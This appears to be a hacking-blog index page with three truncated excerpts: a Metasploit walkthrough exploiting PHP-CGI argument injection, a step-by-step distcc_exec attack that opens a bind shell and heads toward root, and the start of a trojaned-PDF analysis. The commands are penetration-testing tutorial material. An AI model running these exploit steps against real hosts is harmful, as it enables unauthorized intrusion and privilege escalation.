Art Of Explo1t

Hello all. Did you still loyal to my posts ? :) on this occasion I will show a few ways for you who likes to do penetration testing . as you know , a penetration testing was not only stopped when a problem to them , but on this occasion I will share some of these issues so that we can overcome. at this stage I would try to exploit the existing decrepitude on the CGI ( Common Gateway Interface ) for PHP ( Personal Home Page ) 5.x.x Description:   When run as a CGI , PHP 5.3.12 and up to version 5.4.2 is vulnerable   to an argument injection vulnerability . This module takes advantage   of the- d flag to set php.ini directives to Achieve code execution . (you can find the complete information when using a module that we use to type in the info ) ok, now i will show you about that :) open your metasploit using command: # msfconsole then type this command for use the module : command: msf > use exploit/multi/http/php_cgi_arg_injection msf exploi...

Hay guys tonight i will share how to get root privileges to start utilizing the vulnerability gap that exists on the machine "distcc". about distcc: Distcc is designed to speed up compilation by taking advantage of unused processing on another computer. How to : 1. scann the target using the command: nmap -p 1-56635 -sS target-ip-addr then look for port 3633 (distccd) 2. Open your metasploit and enter this command: msf > use exploit/unix/misc/distcc_exec msf exploit( distcc_exec) > set RHOST 192.168.1.10 RHOST => 192.168.1.10 msf exploit( distcc_exec ) > set PAYLOAD cmd/unix/bind_ruby PAYLOAD => cmd/unix/bind_ruby msf exploit( distcc_exec ) > exploit wait until the command shell session opened 3. then use this command : uname -r ( kernel version ) whoami ( print the user name associated with the current effective user ID ) this stage we do not get user id root. so, let's get started privilege escalation make sure the ker...

Introduction : On this occasion I will write some stages of how to analyze a document file extension *.PDF to Determine Whether they were malicious or not. This happened some time ago when I tried to download a study guide book and then the file is detected by anti-virus that I use. this creates great suspicion and then I try to analyze the file, and my guess is true in the document there is a java script which turns a script payload is wrapped into the document. This was some of the steps that I did to analyze. I would do a comparison between a clean PDF document with a document containing a trojan. Equipment : 1. pdfid 2. pdf-parser 3. pdftk.  'apt-get install pdftk' 4. strings in the first stage I will analyze the document " analysis.pdf " that is not interrupted by trojan. OK, now let's go it! test a pdf file # pdfid analysis.pdf the output looks, we just need to pay attention to the line JS / Java Script and turns of the output you ...